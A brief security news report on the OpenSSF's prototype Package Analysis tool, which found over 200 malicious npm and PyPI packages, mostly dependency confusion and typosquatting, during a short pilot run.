Security News > 2022 > May > Open source 'Package Analysis' tool finds malicious npm, PyPI packages
The Open Source Security Foundation, a Linux Foundation-backed initiative has released its first prototype version of the 'Package Analysis' tool that aims to catch and counter malicious attacks on open source registries.
In a pilot run that lasted less than a month, the open source project released on GitHub, was able to identify over 200 malicious npm and PyPI packages.
The project repository contains tools that analyze open source packages, particularly, to hunt for malicious npm and PyPI packages.
"The Package Analysis project seeks to understand the behavior and capabilities of packages available on open source repositories: what files do they access, what addresses do they connect to, and what commands do they run?" explain Caleb Brown and David A. Wheeler, who are involved in OpenSSF's Securing Critical Projects working group.
In its test run that lasted under a month, Package Analysis was able to identify more than 200 malicious PyPI and npm components, according to OpenSSF. The vast majority of these malicious packages, says OpenSSF, are dependency confusion and typosquatting attacks.
"There are lots of opportunities for involvement with this project, and we welcome anyone interested in contributing to the future goals of... detecting differences in package behavior over time; automating the processing of the Package Analysis results; storing the packages themselves as they are processed for long-term analysis; and improving the reliability of the pipeline."